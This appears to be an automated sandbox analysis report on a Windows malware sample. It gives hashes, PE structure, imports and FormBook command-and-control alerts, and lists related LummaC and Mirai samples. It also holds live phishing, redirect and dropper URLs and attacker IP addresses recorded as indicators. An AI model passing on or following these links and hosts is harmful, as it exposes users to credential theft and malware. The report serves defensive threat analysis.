| | PO1268931024 - Bank Slip.exe | malicious | PureLog Stealer | 38.88.82.56 |
| | la.bot.powerpc.elf | malicious | Mirai | 38.58.105.199 |
| | la.bot.sparc.elf | malicious | Unknown | 38.64.166.57 |
| AMAZON-02US | https://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20= | malicious | HTMLPhisher | 13.32.99.103 |
| | https://www.filemail.com/t/cFCAI9C4 | malicious | HtmlDropper | 18.245.46.55 |
| | la.bot.m68k.elf | malicious | Unknown | 52.222.187.148 |
| | la.bot.sparc.elf | malicious | Unknown | 15.193.139.34 |
| | la.bot.arm.elf | malicious | Unknown | 18.246.200.125 |
| | la.bot.mipsel.elf | malicious | Unknown | 3.249.6.186 |
| | https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6 | malicious | Unknown | 44.236.119.144 |
| | https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOcc | malicious | Unknown | 52.49.91.133 |
| | https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6 | malicious | Unknown | 44.236.119.144 |
| | https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUS | malicious | Unknown | 13.227.219.26 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | AcrobatAvj.7z | malicious | Unknown | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
| | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.166.143.48, 3.5.3.65, 54.231.236.129 |
                                                                                                                                        No context
Process: C:\Windows\SysWOW64\takeown.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: modified
Size (bytes): 196608
Entropy (8bit): 1.1215420383712111
Encrypted: false
SSDEEP: 384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5: 9A809AD8B1FDDA60760BB6253358A1DB
SHA1: D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256: 95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512: 2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........ (remainder of the preview is unprintable padding)
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.942461389038916
TrID:
• Win32 Executable (generic) a (10002005/4) 99.81%
• Windows Screen Saver (13104/52) 0.13%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name: z10982283782.exe
File size: 1'114'112 bytes
MD5: 3138edfdc34f754c5f31088f00ae239d
SHA1: 2251e5474cc5af3619f99ee9c6c0042c10b089a6
SHA256: a1f257ec69c19785880ec7a051e3a4030a2edf055fd2e00f7f7f58c43d563cac
SHA512: 1325dc1b872d3972fcc5552a81363e6200490cdcc555073e24ed559dffb24429d1c4ea5dd4a350cea239f339ed00688695138343c95fb40fff9c6f8f8d99714b
SSDEEP: 24576:rCtVqnbUQ25Qm2Xzv3333333333333333333333333333333333333333333333f:rkabm4Yc3qrWyuv
TLSH: 2035BF13A6964433C19305789E6792997E393F302E39A9BD79F87E8C8F342603875277
File Content Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7 (remainder of the preview is unprintable padding)
Icon Hash: bae2a2b2baa2cba1
Entrypoint: 0x46e754
Entrypoint Section: .itext
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics: (none)
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks: (none)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: be622105a275afb1f62a7a713bbb6f71
Instruction (disassembly at entrypoint 0x46e754)
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046DA38h
call 00007F5398D50B59h
mov eax, dword ptr [004FFD50h]
mov eax, dword ptr [eax]
call 00007F5398DA40C1h
mov ecx, dword ptr [004FFE48h]
mov eax, dword ptr [004FFD50h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046D4BCh]
call 00007F5398DA40C1h
mov eax, dword ptr [004FFD50h]
mov eax, dword ptr [eax]
call 00007F5398DA4135h
call 00007F5398D4E93Ch
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al (repeated 64 times; this is the decoding of the zero-byte padding that follows the entry stub, not real code)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x104000 | 0x2624 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x111000 | 0x7400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x109000 | 0x77dc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x108000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10471c | 0x5f0 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6cc78 | 0x6ce00 | 679cf292fba315b6c48b5a741b8454bb | False | 0.5194034335533869 | data | 6.517423558240271 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x6e000 | 0x79c | 0x800 | fa65958be65a2ac83e154aceab0589f4 | False | 0.60302734375 | data | 6.045874841150347 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x6f000 | 0x90eec | 0x91000 | f92cbfa15bfdbf1a608dec2cded70c01 | False | 0.40102033943965515 | data | 6.452367913242279 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x100000 | 0x3698 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x104000 | 0x2624 | 0x2800 | b1bfe93062ceb3b72b5c8ffaf7d76f51 | False | 0.309375 | data | 4.932588648062451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x107000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x108000 | 0x18 | 0x200 | 59811057491060781d7ae66a52c18a9d | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x109000 | 0x77dc | 0x7800 | b8d7f554a4786b460cb72f0a76971854 | False | 0.6180013020833334 | data | 6.674684604138178 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x111000 | 0x7400 | 0x7400 | 0a0a6a5e87122c82d5a795b89dd7859f | False | 0.39075969827586204 | data | 5.432103449175903 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x111a88 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x111bbc | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x111cf0 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x111e24 | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x111f58 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x11208c | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x1121c0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_BITMAP | 0x1122f4 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x1124c4 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
RT_BITMAP | 0x1126a8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
RT_BITMAP | 0x112878 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
RT_BITMAP | 0x112a48 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
RT_BITMAP | 0x112c18 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
RT_BITMAP | 0x112de8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
RT_BITMAP | 0x112fb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x113188 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
RT_BITMAP | 0x113358 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
RT_BITMAP | 0x113528 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
RT_ICON | 0x113610 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.5184647302904565
RT_DIALOG | 0x115bb8 | 0x52 | data | | | 0.7682926829268293
RT_DIALOG | 0x115c0c | 0x52 | data | | | 0.7560975609756098
RT_STRING | 0x115c60 | 0x104 | data | | | 0.6192307692307693
RT_STRING | 0x115d64 | 0x2cc | data | | | 0.4790502793296089
                                                                                                                                        RT_STRING0x1160300xc0data0.6770833333333334
                                                                                                                                        RT_STRING0x1160f00xecdata0.6483050847457628
                                                                                                                                        RT_STRING0x1161dc0x358data0.433411214953271
                                                                                                                                        RT_STRING0x1165340x3d8data0.38109756097560976
                                                                                                                                        RT_STRING0x11690c0x388data0.4092920353982301
                                                                                                                                        RT_STRING0x116c940x3f0data0.35119047619047616
                                                                                                                                        RT_STRING0x1170840x190data0.4975
                                                                                                                                        RT_STRING0x1172140xccdata0.6225490196078431
                                                                                                                                        RT_STRING0x1172e00x1c4data0.5376106194690266
                                                                                                                                        RT_STRING0x1174a40x3c8data0.3181818181818182
                                                                                                                                        RT_STRING0x11786c0x338data0.42961165048543687
                                                                                                                                        RT_STRING0x117ba40x294data0.42424242424242425
                                                                                                                                        RT_RCDATA0x117e380x10data1.5
                                                                                                                                        RT_RCDATA0x117e480x2f8data0.7092105263157895
                                                                                                                                        RT_RCDATA0x1181400x1c2Delphi compiled form 'TForm1'0.7288888888888889
                                                                                                                                        RT_GROUP_CURSOR0x1183040x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                        RT_GROUP_CURSOR0x1183180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                        RT_GROUP_CURSOR0x11832c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x1183680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_CURSOR0x11837c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                        RT_GROUP_ICON0x1183900x14data1.25
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, lstrcmpA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
ole32.dll | CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T07:02:49.845749+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49878 | 3.33.130.190 | 80 | TCP
2024-10-23T07:03:06.830909+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59633 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:09.378022+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59644 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:11.940326+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59650 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:21.450730+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 59651 | 74.48.31.123 | 80 | TCP
2024-10-23T07:03:27.366251+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59652 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:29.881280+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59653 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:32.440366+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59654 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:35.010762+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 59655 | 161.97.168.245 | 80 | TCP
2024-10-23T07:03:41.737445+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59656 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:44.799857+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59657 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:47.347468+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59658 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:50.377967+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 59659 | 154.23.184.240 | 80 | TCP
2024-10-23T07:03:56.709964+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59660 | 194.58.112.174 | 80 | TCP
2024-10-23T07:03:59.356558+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59661 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:01.912056+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59662 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:04.448344+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 59663 | 194.58.112.174 | 80 | TCP
2024-10-23T07:04:10.480043+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59664 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:13.017875+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59665 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:16.229747+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59666 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:18.810436+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 59667 | 3.33.130.190 | 80 | TCP
2024-10-23T07:04:25.362597+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 59668 | 203.90.227.88 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 07:02:08.593161106 CEST | 49699 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.593199015 CEST | 443 | 49699 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:08.593316078 CEST | 49699 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.593673944 CEST | 49699 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.593763113 CEST | 443 | 49699 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:08.593921900 CEST | 49699 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.630835056 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.630872011 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:08.631066084 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.633919001 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:08.633936882 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:10.406738997 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:10.406842947 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:10.411278009 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:10.411287069 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:10.411546946 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:10.464570999 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:10.511346102 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.030004978 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.030026913 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.030071020 CEST | 443 | 49700 | 185.166.143.48 | 192.168.2.7
Oct 23, 2024 07:02:11.030077934 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:11.030133009 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
Oct 23, 2024 07:02:11.040930033 CEST | 49700 | 443 | 192.168.2.7 | 185.166.143.48
